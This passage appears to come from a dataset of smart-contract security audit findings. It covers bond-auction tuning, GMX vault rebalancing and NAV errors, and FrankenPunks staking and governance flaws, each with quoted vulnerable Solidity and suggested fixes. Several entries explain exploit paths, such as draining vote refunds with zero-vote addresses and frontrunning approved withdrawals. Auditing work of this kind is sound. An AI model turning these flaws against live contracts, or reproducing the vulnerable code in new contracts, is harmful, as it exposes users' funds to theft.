if (!isLive(id_)) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that the intervals are non-zero\\n if (intervals_[0] == 0 || intervals_[1] == 0 || intervals_[2] == 0)\\n revert Auctioneer_InvalidParams();\\n\\n\\n // Check that tuneInterval >= tuneAdjustmentDelay\\n if (intervals_[0] < intervals_[1]) revert Auctioneer_InvalidParams();\\n\\n\\n BondMetadata storage meta = metadata[id_];\\n // Check that tuneInterval >= depositInterval\\n if (intervals_[0] < meta.depositInterval) revert 
Auctioneer_InvalidParams();\\n\\n\\n // Check that debtDecayInterval >= minDebtDecayInterval\\n if (intervals_[2] < minDebtDecayInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that sender is market owner\\n BondMarket memory market = markets[id_];\\n if (msg.sender != market.owner) revert Auctioneer_OnlyMarketOwner();\\n\\n\\n // Update intervals\\n meta.tuneInterval = intervals_[0];\\n meta.tuneIntervalCapacity = market.capacity.mulDiv(\\n uint256(intervals_[0]),\\n uint256(terms[id_].conclusion) - block.timestamp\\n ); // don't have a stored value for market duration, this will update tuneIntervalCapacity based on time remaining\\n meta.tuneAdjustmentDelay = intervals_[1];\\n meta.debtDecayInterval = intervals_[2];\\n }\\n```\\n\\n`meta.tuneInterval` has impact on `meta.tuneIntervalCapacity`. That means that when you change tuning interval you also change the capacity that is operated during tuning. There is also one more param that depends on this, but is not counted here.\\n```\\n if (\\n (market.capacity < meta.tuneBelowCapacity && timeNeutralCapacity < initialCapacity) ||\\n (time_ >= meta.lastTune + meta.tuneInterval && timeNeutralCapacity > initialCapacity)\\n ) {\\n // Calculate the correct payout to complete on time assuming each bond\\n // will be max size in the desired deposit interval for the remaining time\\n //\\n // i.e. market has 10 days remaining. deposit interval is 1 day. capacity\\n // is 10,000 TOKEN. 
max payout would be 1,000 TOKEN (10,000 * 1 / 10).\\n markets[id_].maxPayout = capacity.mulDiv(uint256(meta.depositInterval), timeRemaining);\\n\\n\\n // Calculate ideal target debt to satisty capacity in the remaining time\\n // The target debt is based on whether the market is under or oversold at this point in time\\n // This target debt will ensure price is reactive while ensuring the magnitude of being over/undersold\\n // doesn't cause larger fluctuations towards the end of the market.\\n //\\n // Calculate target debt from the timeNeutralCapacity and the ratio of debt decay interval and the length of the market\\n uint256 targetDebt = timeNeutralCapacity.mulDiv(\\n uint256(meta.debtDecayInterval),\\n uint256(meta.length)\\n );\\n\\n\\n // Derive a new control variable from the target debt\\n uint256 controlVariable = terms[id_].controlVariable;\\n uint256 newControlVariable = price_.mulDivUp(market.scale, targetDebt);\\n\\n\\n emit Tuned(id_, controlVariable, newControlVariable);\\n\\n\\n if (newControlVariable < controlVariable) {\\n // If decrease, control variable change will be carried out over the tune interval\\n // this is because price will be lowered\\n uint256 change = controlVariable - newControlVariable;\\n adjustments[id_] = Adjustment(change, time_, meta.tuneAdjustmentDelay, true);\\n } else {\\n // Tune up immediately\\n terms[id_].controlVariable = newControlVariable;\\n // Set current adjustment to inactive (e.g. if we are re-tuning early)\\n adjustments[id_].active = false;\\n }\\n\\n\\n metadata[id_].lastTune = time_;\\n metadata[id_].tuneBelowCapacity = market.capacity > meta.tuneIntervalCapacity\\n ? 
market.capacity - meta.tuneIntervalCapacity\\n : 0;\\n metadata[id_].lastTuneDebt = targetDebt;\\n }\\n```\\n\\nIf you don't update `meta.tuneBelowCapacity` when changing intervals you have a risk, that price will not be tuned when tuneIntervalCapacity was decreased or it will be still tuned when tuneIntervalCapacity was increased.\\nAs a result tuning will not be completed when needed.чUpdate meta.tuneBelowCapacity in BondBaseSDA.setIntervals function.чTuning logic will not be completed when needed.ч```\\n function setIntervals(uint256 id_, uint32[3] calldata intervals_) external override {\\n // Check that the market is live\\n if (!isLive(id_)) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that the intervals are non-zero\\n if (intervals_[0] == 0 || intervals_[1] == 0 || intervals_[2] == 0)\\n revert Auctioneer_InvalidParams();\\n\\n\\n // Check that tuneInterval >= tuneAdjustmentDelay\\n if (intervals_[0] < intervals_[1]) revert Auctioneer_InvalidParams();\\n\\n\\n BondMetadata storage meta = metadata[id_];\\n // Check that tuneInterval >= depositInterval\\n if (intervals_[0] < meta.depositInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that debtDecayInterval >= minDebtDecayInterval\\n if (intervals_[2] < minDebtDecayInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that sender is market owner\\n BondMarket memory market = markets[id_];\\n if (msg.sender != market.owner) revert Auctioneer_OnlyMarketOwner();\\n\\n\\n // Update intervals\\n meta.tuneInterval = intervals_[0];\\n meta.tuneIntervalCapacity = market.capacity.mulDiv(\\n uint256(intervals_[0]),\\n uint256(terms[id_].conclusion) - block.timestamp\\n ); // don't have a stored value for market duration, this will update tuneIntervalCapacity based on time remaining\\n meta.tuneAdjustmentDelay = intervals_[1];\\n meta.debtDecayInterval = intervals_[2];\\n }\\n```\\n -DnGmxJuniorVaultManager#_rebalanceBorrow logic is flawed and could result in vault 
liquidationчhighчDnGmxJuniorVaultManager#_rebalanceBorrow fails to rebalance correctly if only one of the two assets needs a rebalance. In the case where one assets increases rapidly in price while the other stays constant, the vault may be liquidated.\\n```\\n // If both eth and btc swap amounts are not beyond the threshold then no flashloan needs to be executed | case 1\\n if (btcAssetAmount == 0 && ethAssetAmount == 0) return;\\n\\n if (repayDebtBtc && repayDebtEth) {\\n // case where both the token assets are USDC\\n // only one entry required which is combined asset amount for both tokens\\n assets = new address[](1);\\n amounts = new uint256[](1);\\n\\n assets[0] = address(state.usdc);\\n amounts[0] = (btcAssetAmount + ethAssetAmount);\\n } else if (btcAssetAmount == 0 || ethAssetAmount == 0) {\\n // Exactly one would be true since case-1 excluded (both false) | case-2\\n // One token amount = 0 and other token amount > 0\\n // only one entry required for the non-zero amount token\\n assets = new address[](1);\\n amounts = new uint256[](1);\\n\\n if (btcAssetAmount == 0) {\\n assets[0] = (repayDebtBtc ? address(state.usdc) : address(state.wbtc));\\n amounts[0] = btcAssetAmount;\\n } else {\\n assets[0] = (repayDebtEth ? address(state.usdc) : address(state.weth));\\n amounts[0] = ethAssetAmount;\\n }\\n```\\n\\nThe logic above is used to determine what assets to borrow using the flashloan. If the rebalance amount is under a threshold then the assetAmount is set equal to zero. The first check `if (btcAssetAmount == 0 && ethAssetAmount == 0) return;` is a short circuit that returns if neither asset is above the threshold. The third check `else if (btcAssetAmount == 0 || ethAssetAmount == 0)` is the point of interest. Since we short circuit if both are zero then to meet this condition exactly one asset needs to be rebalanced. The logic that follows is where the error is. 
In the comments it indicates that it needs to enter with the non-zero amount token but the actual logic reflects the opposite. If `btcAssetAmount == 0` it actually tries to enter with wBTC which would be the zero amount asset.\\nThe result of this can be catastrophic for the vault. If one token increases in value rapidly while the other is constant the vault will only ever try to rebalance the one token but because of this logical error it will never actually complete the rebalance. If the token increase in value enough the vault would actually end up becoming liquidated.чSmall change to reverse the logic and make it correct:\\n```\\n- if (btcAssetAmount == 0) {\\n+ if (btcAssetAmount != 0) {\\n assets[0] = (repayDebtBtc ? address(state.usdc) : address(state.wbtc));\\n amounts[0] = btcAssetAmount;\\n } else {\\n assets[0] = (repayDebtEth ? address(state.usdc) : address(state.weth));\\n amounts[0] = ethAssetAmount;\\n }\\n```\\nчVault is unable to rebalance correctly if only one asset needs to be rebalanced, which can lead to the vault being liquidatedч```\\n // If both eth and btc swap amounts are not beyond the threshold then no flashloan needs to be executed | case 1\\n if (btcAssetAmount == 0 && ethAssetAmount == 0) return;\\n\\n if (repayDebtBtc && repayDebtEth) {\\n // case where both the token assets are USDC\\n // only one entry required which is combined asset amount for both tokens\\n assets = new address[](1);\\n amounts = new uint256[](1);\\n\\n assets[0] = address(state.usdc);\\n amounts[0] = (btcAssetAmount + ethAssetAmount);\\n } else if (btcAssetAmount == 0 || ethAssetAmount == 0) {\\n // Exactly one would be true since case-1 excluded (both false) | case-2\\n // One token amount = 0 and other token amount > 0\\n // only one entry required for the non-zero amount token\\n assets = new address[](1);\\n amounts = new uint256[](1);\\n\\n if (btcAssetAmount == 0) {\\n assets[0] = (repayDebtBtc ? 
address(state.usdc) : address(state.wbtc));\\n amounts[0] = btcAssetAmount;\\n } else {\\n assets[0] = (repayDebtEth ? address(state.usdc) : address(state.weth));\\n amounts[0] = ethAssetAmount;\\n }\\n```\\n -DnGmxJuniorVaultManager#_totalAssets current implementation doesn't properly maximize or minimizeчmediumчThe maximize input to DnGmxJuniorVaultManager#_totalAssets indicates whether to either maximize or minimize the NAV. Internal logic of the function doesn't accurately reflect that because under some circumstances, maximize = true actually returns a lower value than maximize = false.\\n```\\n uint256 unhedgedGlp = (state.unhedgedGlpInUsdc + dnUsdcDepositedPos).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // calculate current borrow amounts\\n (uint256 currentBtc, uint256 currentEth) = _getCurrentBorrows(state);\\n uint256 totalCurrentBorrowValue = _getBorrowValue(state, currentBtc, currentEth);\\n\\n // add negative part to current borrow value which will be subtracted at the end\\n // convert usdc amount into glp amount\\n uint256 borrowValueGlp = (totalCurrentBorrowValue + dnUsdcDepositedNeg).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // if we need to minimize then add additional slippage\\n if (!maximize) unhedgedGlp = unhedgedGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n if (!maximize) borrowValueGlp = borrowValueGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n```\\n\\nTo maximize the estimate for the NAV of the vault underlying debt should minimized and value of held assets should be maximized. Under the current settings there is a mix of both of those and the function doesn't consistently minimize or maximize. Consider when NAV is \"maxmized\". Under this scenario the value of when estimated the GlpPrice is minimized. This minimizes the value of both the borrowedGlp (debt) and of the unhedgedGlp (assets). 
The result is that the NAV is not maximized because the value of the assets are also minimized. In this scenario the GlpPrice should be maximized when calculating the assets and minimized when calculating the debt. The reverse should be true when minimizing the NAV. Slippage requirements are also applied incorrectly when adjusting borrowValueGlp. The current implementation implies that if the debt were to be paid back that the vault would repay their debt for less than expected. When paying back debt the slippage should imply paying more than expected rather than less, therefore the slippage should be added rather than subtracted.чTo properly maximize the it should assume the best possible rate for exchanging it's assets. Likewise to minimize it should assume it's debt is a large as possible and this it encounters maximum possible slippage when repaying it's debt. I recommend the following changes:\\n```\\n uint256 unhedgedGlp = (state.unhedgedGlpInUsdc + dnUsdcDepositedPos).mulDivDown(\\n PRICE_PRECISION,\\n- _getGlpPrice(state, !maximize)\\n+ _getGlpPrice(state, maximize)\\n );\\n\\n // calculate current borrow amounts\\n (uint256 currentBtc, uint256 currentEth) = _getCurrentBorrows(state);\\n uint256 totalCurrentBorrowValue = _getBorrowValue(state, currentBtc, currentEth);\\n\\n // add negative part to current borrow value which will be subtracted at the end\\n // convert usdc amount into glp amount\\n uint256 borrowValueGlp = (totalCurrentBorrowValue + dnUsdcDepositedNeg).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // if we need to minimize then add additional slippage\\n if (!maximize) unhedgedGlp = unhedgedGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n- if (!maximize) borrowValueGlp = borrowValueGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n+ if (!maximize) borrowValueGlp = borrowValueGlp.mulDivDown(MAX_BPS + state.slippageThresholdGmxBps, 
MAX_BPS);\\n```\\nчDnGmxJuniorVaultManager#_totalAssets doesn't accurately reflect NAV. Since this is used when determining critical parameters it may lead to inaccuracies.ч```\\n uint256 unhedgedGlp = (state.unhedgedGlpInUsdc + dnUsdcDepositedPos).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // calculate current borrow amounts\\n (uint256 currentBtc, uint256 currentEth) = _getCurrentBorrows(state);\\n uint256 totalCurrentBorrowValue = _getBorrowValue(state, currentBtc, currentEth);\\n\\n // add negative part to current borrow value which will be subtracted at the end\\n // convert usdc amount into glp amount\\n uint256 borrowValueGlp = (totalCurrentBorrowValue + dnUsdcDepositedNeg).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // if we need to minimize then add additional slippage\\n if (!maximize) unhedgedGlp = unhedgedGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n if (!maximize) borrowValueGlp = borrowValueGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n```\\n -`Staking.unstake()` doesn't decrease the original voting power that was used in `Staking.stake()`.чhighч`Staking.unstake()` doesn't decrease the original voting power that was used in `Staking.stake()`.\\nWhen users stake/unstake the underlying NFTs, it calculates the token voting power using getTokenVotingPower() and increases/decreases their voting power accordingly.\\n```\\n function getTokenVotingPower(uint _tokenId) public override view returns (uint) {\\n if (ownerOf(_tokenId) == address(0)) revert NonExistentToken();\\n\\n // If tokenId < 10000, it's a FrankenPunk, so 100/100 = a multiplier of 1\\n uint multiplier = _tokenId < 10_000 ? 
PERCENT : monsterMultiplier;\\n \\n // evilBonus will return 0 for all FrankenMonsters, as they are not eligible for the evil bonus\\n return ((baseVotes * multiplier) / PERCENT) + stakedTimeBonus[_tokenId] + evilBonus(_tokenId);\\n }\\n```\\n\\nBut `getTokenVotingPower()` uses some parameters like `monsterMultiplier` and `baseVotes` and the output would be changed for the same `tokenId` after the admin changed these settings.\\nCurrently, `_stake()` and `_unstake()` calculates the token voting power independently and the below scenario would be possible.\\nAt the first time, `baseVotes = 20, monsterMultiplier = 50`.\\nA user staked a `FrankenMonsters` and his voting power = 10 here.\\nAfter that, the admin changed `monsterMultiplier = 60`.\\nWhen a user tries to unstake the NFT, the token voting power will be `20 * 60 / 100 = 12` here.\\nSo it will revert with uint underflow here.\\nAfter all, he can't unstake the NFT.чI think we should add a mapping like `tokenVotingPower` to save an original token voting power when users stake the token and decrease the same amount when they unstake.ч`votesFromOwnedTokens` might be updated wrongly or users can't unstake for the worst case because it doesn't decrease the same token voting power while unstaking.ч```\\n function getTokenVotingPower(uint _tokenId) public override view returns (uint) {\\n if (ownerOf(_tokenId) == address(0)) revert NonExistentToken();\\n\\n // If tokenId < 10000, it's a FrankenPunk, so 100/100 = a multiplier of 1\\n uint multiplier = _tokenId < 10_000 ? PERCENT : monsterMultiplier;\\n \\n // evilBonus will return 0 for all FrankenMonsters, as they are not eligible for the evil bonus\\n return ((baseVotes * multiplier) / PERCENT) + stakedTimeBonus[_tokenId] + evilBonus(_tokenId);\\n }\\n```\\n -Staking#_unstake removes votes from wrong person if msg.sender != ownerчhighчStaking#_unstake allows any msg.sender to unstake tokens for any owner that has approved them. 
The issue is that even when msg.sender != owner the votes are removed from msg.sender instead of owner. The result is that the owner keeps their votes and msg.sender loses theirs. This could be abused to hijack or damage voting.\\n```\\naddress owner = ownerOf(_tokenId);\\nif (msg.sender != owner && !isApprovedForAll[owner][msg.sender] && msg.sender != getApproved[_tokenId]) revert NotAuthorized();\\n```\\n\\nStaking#_unstake allows any msg.sender to unstake tokens for any owner that has approved them.\\n```\\nuint lostVotingPower;\\nfor (uint i = 0; i < numTokens; i++) {\\n lostVotingPower += _unstakeToken(_tokenIds[i], _to);\\n}\\n\\nvotesFromOwnedTokens[msg.sender] -= lostVotingPower;\\n// Since the delegate currently has the voting power, it must be removed from their balance\\n// If the user doesn't delegate, delegates(msg.sender) will return self\\ntokenVotingPower[getDelegate(msg.sender)] -= lostVotingPower;\\ntotalTokenVotingPower -= lostVotingPower;\\n```\\n\\nAfter looping through _unstakeToken all accumulated votes are removed from msg.sender. The problem with this is that msg.sender is allowed to unstake tokens for users other than themselves and in these cases they will lose votes rather than the user who owns the token.\\nExample: User A and User B both stake tokens and have 10 votes each. User A approves User B to unstake their tokens. User B calls unstake for User A. User B is msg.sender and User A is owner. The votes should be removed from owner but instead are removed from msg.sender. The result is that after unstaking User B has a vote balance of 0 while still having their locked token and User B has a vote balance of 10 and their token back. Now User B is unable to unstake their token because their votes will underflow on unstake, permanently trapping their NFT.чRemove the ability for users to unstake for other usersчVotes are removed incorrectly if msg.sender != owner. 
By extension this would forever trap msg.sender tokens in the contract.ч```\\naddress owner = ownerOf(_tokenId);\\nif (msg.sender != owner && !isApprovedForAll[owner][msg.sender] && msg.sender != getApproved[_tokenId]) revert NotAuthorized();\\n```\\n -castVote can be called by anyone even those without votesчmediumчGovernance#castVote can be called by anyone, even users that don't have any votes. Since the voting refund is per address, an adversary could use a large number of addresses to vote with zero votes to drain the vault.\\n```\\nfunction _castVote(address _voter, uint256 _proposalId, uint8 _support) internal returns (uint) {\\n // Only Active proposals can be voted on\\n if (state(_proposalId) != ProposalState.Active) revert InvalidStatus();\\n \\n // Only valid values for _support are 0 (against), 1 (for), and 2 (abstain)\\n if (_support > 2) revert InvalidInput();\\n\\n Proposal storage proposal = proposals[_proposalId];\\n\\n // If the voter has already voted, revert \\n Receipt storage receipt = proposal.receipts[_voter];\\n if (receipt.hasVoted) revert AlreadyVoted();\\n\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n\\n // Update the user's receipt for this proposal\\n receipt.hasVoted = true;\\n receipt.support = _support;\\n receipt.votes = votes;\\n\\n // Make these updates after the vote so it doesn't impact voting power for this vote.\\n ++totalCommunityScoreData.votes;\\n\\n // We can update the total community voting power with no check because if you can vote, \\n // it means you have 
votes so you haven't delegated.\\n ++userCommunityScoreData[_voter].votes;\\n\\n return votes;\\n}\\n```\\n\\nNowhere in the flow of voting does the function revert if the user calling it doesn't actually have any votes. staking#getVotes won't revert under any circumstances. Governance#_castVote only reverts if 1) the proposal isn't active 2) support > 2 or 3) if the user has already voted. The result is that any user can vote even if they don't have any votes, allowing users to maliciously burn vault funds by voting and claiming the vote refund.чGovernance#_castVote should revert if msg.sender doesn't have any votes:\\n```\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n+ if (votes == 0) revert NoVotes();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n```\\nчVault can be drained maliciously by users with no votesч```\\nfunction _castVote(address _voter, uint256 _proposalId, uint8 _support) internal returns (uint) {\\n // Only Active proposals can be voted on\\n if (state(_proposalId) != ProposalState.Active) revert InvalidStatus();\\n \\n // Only valid values for _support are 0 (against), 1 (for), and 2 (abstain)\\n if (_support > 2) revert InvalidInput();\\n\\n Proposal storage proposal = proposals[_proposalId];\\n\\n // If the voter has already voted, revert \\n Receipt storage receipt = proposal.receipts[_voter];\\n if (receipt.hasVoted) revert AlreadyVoted();\\n\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = 
(staking.getVotes(_voter)).toUint24();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n\\n // Update the user's receipt for this proposal\\n receipt.hasVoted = true;\\n receipt.support = _support;\\n receipt.votes = votes;\\n\\n // Make these updates after the vote so it doesn't impact voting power for this vote.\\n ++totalCommunityScoreData.votes;\\n\\n // We can update the total community voting power with no check because if you can vote, \\n // it means you have votes so you haven't delegated.\\n ++userCommunityScoreData[_voter].votes;\\n\\n return votes;\\n}\\n```\\n -Delegate can keep delegatee trapped indefinitelyчmediumчUsers are allowed to delegate their votes to other users. Since staking does not implement checkpoints, users are not allowed to delegate or unstake during an active proposal if their delegate has already voted. A malicious delegate can abuse this by creating proposals so that there is always an active proposal and their delegatees are always locked to them.\\n```\\nmodifier lockedWhileVotesCast() {\\n uint[] memory activeProposals = governance.getActiveProposals();\\n for (uint i = 0; i < activeProposals.length; i++) {\\n if (governance.getReceipt(activeProposals[i], getDelegate(msg.sender)).hasVoted) revert TokenLocked();\\n (, address proposer,) = governance.getProposalData(activeProposals[i]);\\n if (proposer == getDelegate(msg.sender)) revert TokenLocked();\\n }\\n _;\\n}\\n```\\n\\nThe above modifier is applied when unstaking or delegating. This reverts if the delegate of msg.sender either has voted or currently has an open proposal. The result is that under those conditions, the delegatee cannot unstake or delegate.
A malicious delegate can abuse these conditions to keep their delegatees forever delegated to them. They would keep opening proposals so that delegatees could never unstake or delegate. A single users can only have a one proposal opened at the same time so they would use a secondary account to alternate and always keep an active proposal.чThere should be a function to emergency eject the token from staking. To prevent abuse a token that has been emergency ejected should be blacklisted from staking again for a certain cooldown period, such as the length of current voting period.чDelegatees can never unstake or delegate to anyone elseч```\\nmodifier lockedWhileVotesCast() {\\n uint[] memory activeProposals = governance.getActiveProposals();\\n for (uint i = 0; i < activeProposals.length; i++) {\\n if (governance.getReceipt(activeProposals[i], getDelegate(msg.sender)).hasVoted) revert TokenLocked();\\n (, address proposer,) = governance.getProposalData(activeProposals[i]);\\n if (proposer == getDelegate(msg.sender)) revert TokenLocked();\\n }\\n _;\\n}\\n```\\n -If a user approves junior vault tokens to WithdrawPeriphery, anyone can withdraw/redeem his/her tokenчhighчIf users want to withdraw/redeem tokens by WithdrawPeriphery, they should approve token approval to WithdrawPeriphery, then call `withdrawToken()` or `redeemToken()`. 
But if users approve `dnGmxJuniorVault` to WithdrawPeriphery, anyone can withdraw/redeem his/her token.\\nUsers should approve `dnGmxJuniorVault` before calling `withdrawToken()` or redeemToken():\\n```\\n function withdrawToken(\\n address from,\\n address token,\\n address receiver,\\n uint256 sGlpAmount\\n ) external returns (uint256 amountOut) {\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.withdraw(sGlpAmount, address(this), from);\\n// rest of code\\n\\n function redeemToken(\\n address from,\\n address token,\\n address receiver,\\n uint256 sharesAmount\\n ) external returns (uint256 amountOut) {\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.redeem(sharesAmount, address(this), from);\\n// rest of code\\n```\\n\\nFor better user experience, we always use `approve(WithdrawPeriphery, type(uint256).max)`. It means that if Alice approves the max amount, anyone can withdraw/redeem her tokens anytime. Another scenario is that if Alice approves 30 amounts, she wants to call `withdrawToken` to withdraw 30 tokens. But in this case Alice should send two transactions separately, then an attacker can frontrun `withdrawToken` transaction and withdraw Alice's token.чReplace `from` parameter by `msg.sender`.\\n```\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.withdraw(sGlpAmount, address(this), msg.sender);\\n\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.redeem(sharesAmount, address(this), msg.sender);\\n```\\nчAttackers can frontrun withdraw/redeem transactions and steal tokens. 
And some UI always approves max amount, which means that anyone can withdraw users tokens.ч```\\n function withdrawToken(\\n address from,\\n address token,\\n address receiver,\\n uint256 sGlpAmount\\n ) external returns (uint256 amountOut) {\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.withdraw(sGlpAmount, address(this), from);\\n// rest of code\\n\\n function redeemToken(\\n address from,\\n address token,\\n address receiver,\\n uint256 sharesAmount\\n ) external returns (uint256 amountOut) {\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.redeem(sharesAmount, address(this), from);\\n// rest of code\\n```\\n -DnGmxJuniorVaultManager#harvestFees can push junior vault borrowedUSDC above borrow cap and DOS vaultчmediumчDnGmxJuniorVaultManager#harvestFees grants fees to the senior vault by converting the WETH to USDC and staking it directly. The result is that the senior vault gains value indirectly by increasing the debt of the junior vault. If the junior vault is already at it's borrow cap this will push it's total borrow over the borrow cap causing DnGmxSeniorVault#availableBorrow to underflow and revert. 
This is called each time a user deposits or withdraws from the junior vault meaning that the junior vault can no longer deposit or withdraw.\\n```\\n if (_seniorVaultWethRewards > state.wethConversionThreshold) {\\n // converts senior tranche share of weth into usdc and deposit into AAVE\\n // Deposit aave vault share to AAVE in usdc\\n uint256 minUsdcAmount = _getTokenPriceInUsdc(state, state.weth).mulDivDown(\\n _seniorVaultWethRewards * (MAX_BPS - state.slippageThresholdSwapEthBps),\\n MAX_BPS * PRICE_PRECISION\\n );\\n // swaps weth into usdc\\n (uint256 aaveUsdcAmount, ) = state._swapToken(\\n address(state.weth),\\n _seniorVaultWethRewards,\\n minUsdcAmount\\n );\\n\\n // supplies usdc into AAVE\\n state._executeSupply(address(state.usdc), aaveUsdcAmount);\\n\\n // resets senior tranche rewards\\n state.seniorVaultWethRewards = 0;\\n```\\n\\nThe above lines converts the WETH owed to the senior vault to USDC and deposits it into Aave. Increasing the aUSDC balance of the junior vault.\\n```\\nfunction getUsdcBorrowed() public view returns (uint256 usdcAmount) {\\n return\\n uint256(\\n state.aUsdc.balanceOf(address(this)).toInt256() -\\n state.dnUsdcDeposited -\\n state.unhedgedGlpInUsdc.toInt256()\\n );\\n}\\n```\\n\\nThe amount of USDC borrowed is calculated based on the amount of aUSDC that the junior vault has. By depositing the fees directly above, the junior vault has effectively \"borrowed\" more USDC. This can be problematic if the junior vault is already at it's borrow cap.\\n```\\nfunction availableBorrow(address borrower) public view returns (uint256 availableAUsdc) {\\n uint256 availableBasisCap = borrowCaps[borrower] - IBorrower(borrower).getUsdcBorrowed();\\n uint256 availableBasisBalance = aUsdc.balanceOf(address(this));\\n\\n availableAUsdc = availableBasisCap < availableBasisBalance ? 
availableBasisCap : availableBasisBalance;\\n}\\n```\\n\\nIf the vault is already at it's borrow cap then the line calculating `availableBasisCap` will underflow and revert.чCheck if borrowed exceeds borrow cap and return zero to avoid underflow:\\n```\\nfunction availableBorrow(address borrower) public view returns (uint256 availableAUsdc) {\\n\\n+ uint256 borrowCap = borrowCaps[borrower];\\n+ uint256 borrowed = IBorrower(borrower).getUsdcBorrowed();\\n\\n+ if (borrowed > borrowCap) return 0;\\n\\n+ uint256 availableBasisCap = borrowCap - borrowed;\\n\\n- uint256 availableBasisCap = borrowCaps[borrower] - IBorrower(borrower).getUsdcBorrowed();\\n uint256 availableBasisBalance = aUsdc.balanceOf(address(this));\\n\\n availableAUsdc = availableBasisCap < availableBasisBalance ? availableBasisCap : availableBasisBalance;\\n}\\n```\\nчavailableBorrow will revert causing deposits/withdraws to revertч```\\n if (_seniorVaultWethRewards > state.wethConversionThreshold) {\\n // converts senior tranche share of weth into usdc and deposit into AAVE\\n // Deposit aave vault share to AAVE in usdc\\n uint256 minUsdcAmount = _getTokenPriceInUsdc(state, state.weth).mulDivDown(\\n _seniorVaultWethRewards * (MAX_BPS - state.slippageThresholdSwapEthBps),\\n MAX_BPS * PRICE_PRECISION\\n );\\n // swaps weth into usdc\\n (uint256 aaveUsdcAmount, ) = state._swapToken(\\n address(state.weth),\\n _seniorVaultWethRewards,\\n minUsdcAmount\\n );\\n\\n // supplies usdc into AAVE\\n state._executeSupply(address(state.usdc), aaveUsdcAmount);\\n\\n // resets senior tranche rewards\\n state.seniorVaultWethRewards = 0;\\n```\\n -WithdrawPeriphery#_convertToToken slippage control is broken for any token other than USDCчmediumчWithdrawPeriphery allows the user to redeem junior share vaults to any token available on GMX, applying a fixed slippage threshold to all redeems. The slippage calculation always returns the number of tokens to 6 decimals. 
This works fine for USDC but for other tokens like WETH or WBTC that are 18 decimals the slippage protection is completely ineffective and can lead to loss of funds for users that are withdrawing.\\n```\\nfunction _convertToToken(address token, address receiver) internal returns (uint256 amountOut) {\\n // this value should be whatever glp is received by calling withdraw/redeem to junior vault\\n uint256 outputGlp = fsGlp.balanceOf(address(this));\\n\\n // using min price of glp because giving in glp\\n uint256 glpPrice = _getGlpPrice(false);\\n\\n // using max price of token because taking token out of gmx\\n uint256 tokenPrice = gmxVault.getMaxPrice(token);\\n\\n // apply slippage threshold on top of estimated output amount\\n uint256 minTokenOut = outputGlp.mulDiv(glpPrice * (MAX_BPS - slippageThreshold), tokenPrice * MAX_BPS);\\n\\n // will revert if atleast minTokenOut is not received\\n amountOut = rewardRouter.unstakeAndRedeemGlp(address(token), outputGlp, minTokenOut, receiver);\\n}\\n```\\n\\nWithdrawPeriphery allows the user to redeem junior share vaults to any token available on GMX. To prevent users from losing large amounts of value to MEV the contract applies a fixed percentage slippage. minToken out is returned to 6 decimals regardless of the token being requested. 
